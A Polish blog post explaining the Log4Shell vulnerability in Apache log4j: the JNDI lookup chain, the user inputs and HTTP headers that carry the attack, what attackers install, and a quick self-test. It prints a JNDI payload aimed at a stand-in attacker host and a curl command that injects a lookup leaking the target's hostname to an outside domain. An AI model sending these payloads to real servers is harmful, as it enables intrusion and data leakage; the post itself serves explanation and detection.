2022-08-13-09-08-54-jak-dziala-podatnosc-log4shell.png

Jak działa podatność Log4Shell

Apache log4j jest jedną z najczęściej wykorzystywanych bibliotek w języku Java. Jednocześnie rok temu stwierdzono w niej wiele podatności, które okazały się podatnościami stulecia.

Nasz blog może się rozwijać dzięki naszym sponsorom. Nasz kurs dockera powstał dzięki współpracy z chmurami Vultr i tam dokładnie został przetestowany. Nasz szablon pochodzi z Envato MarketPlace. Wszystkie pluginy i elementy stron internetowych, jakie opisujemy, pochodzą z Envato Elements. Wszystkie książki, opisane na tym blogu, są dostepne u wydawcy Helion. Jesteśmy także partnerem Respondent.io, platformy, która płaci za testowanie aplikacji.

Mowa tutaj oczywiście o CVE-2021-44228 i CVE-2021-45046, które są bardzo łatwe do wykorzystania, a które umożliwiają atakującym uruchomienie dowolnego kodu na Twoich serwerach.

Apache log4j jest jedną z najczęściej używanych bibliotek rejestrujących Java. Luka oznaczona jako CVE-2021-44228 (wraz z CVE-2021-45046) jest łatwa do wykorzystania i umożliwia atakującym uruchomienie swojego kodu na Twoim serwerze. Należy pamiętać, że sama podatność występuje zarówno w komercyjnych produktach, takich jak VMWARE, jak i w produktach open source, takich jak Apache Solr czy Apache Druid.

Dlaczego ta podatność jest tak istotna z punktu widzenia atakujących? W zasadzie jest to proste. Prawie każde dane wejściowe, jakich używa aplikacja w Javie, są rejestrowane przez bibliotekę log4j. Odpowiednio spreparowane dane wejściowe mogą spowodować, że dotrą one aż do JNDI i potencjalnie pozwolą na wykonanie dowolnego kodu w języku Java.

Jak tak naprawdę działa ten atak

  1. Po pierwsze dane od użytkownika są przesyłane do serwera za pomocą dowolnego protokołu.
  2. Po drugie serwer rejestruje przesyłane dane, w tym złośliwy ładunek ${jndi:ldap://atakujący.example.com/payload1}
  3. Po trzecie ładunek w domenie kontrolwoanej przez atakującego aktywuje podatność log4j na zdalnym serwerze i wysyła do atakującego nazwę oraz interfejsy dla danego katalogu.
  4. Po czwarte od tej chwili atakujący może kontrolować odpowiedzi i dołączać adresy UTL do zdalnych plików class języka Java. Ten plik jest wstrzykiwany do procesu serwera.
  5. Po piąte wstrzyknięty ładunek pozwala atakującemu na wykonanie dowolnego kodu na zdalnym serwerze.

Do czego można wykorzystać podatność Log4shell

Okazuje się, że atakujący mogą w bardzo łatwy sposób sprawdzić, czy w danej aplikacji występuje ta podatność i czy można ją wykorzystać w dowolnym miejscu, w którym dany użytkownik wprowadza dane. Elementami takimi mogą być formularze logowania, nagłówki http, takie jak User-Agent lub X-Forwarded-For albo inne niestandardowe nagłówki.

Podatność log4shell jest obecnie wykorzystywana bardzo aktywnie wykorzystywana przez cyberprzestępców, ponieważ umożliwia zdalne wykonanie kodu, a należy pamiętać, że zdalne wykonanie kodu to jedna z najgroźniejszych podatności, ponieważ umożliwia ona atakującym przejmowanie pełnej kontroli nad danym serwerem internetowym.

Podatność zdalnego wykonania kodu może posłużyć do zainstalowania koparek kryptowalut, czy oprogramowania typu Cobalt Strike, które może zostać użyte do kradzieży poświadczeń użytkowników czy pobierania danych z zewnętrznych serwerów. Na koniec, ta podatność może posłużyć do wdrażania oprogramowania ransomware.

Sama podatność ma olbrzymi wpływ na tysiące organizacji na całym świecie. Przestępcy mogą wykorzystać tę lukę, aby uzyskać dostęp do wewnętrznych zasobów firmy i narazić na ryzyko tajemnice i infrastrukturę całej firmy – na przykład poprzez kradzież danych i wdrożenie ataku ransomware.

Jak szybko przetestować, czy jesteśmy podatni na log4shell

Aby zapobiec tego rodzaju scenariuszom, w zależności od wersji, której dotyczy luka, należy zastosować poprawki eliminujące tę lukę. Ponadto lukę można łatwo wykryć, korzystając ze specjalnie spreparowanego ładunku.

curl target_server:port -H 'X-Api-Version: ${jndi:ldap://x${hostName}.L4J..silencedevs.com/a}'

Udostępnij

Porozmawiajmy o Twoich potrzebach

POROZMAWIAJMY O USŁUGACH, JAKICH POTRZEBUJESZ DLA SWOJEGO BIZNESU

Z chęcia pomożemy Ci wzrastać w wybranym przez Ciebie biznesie.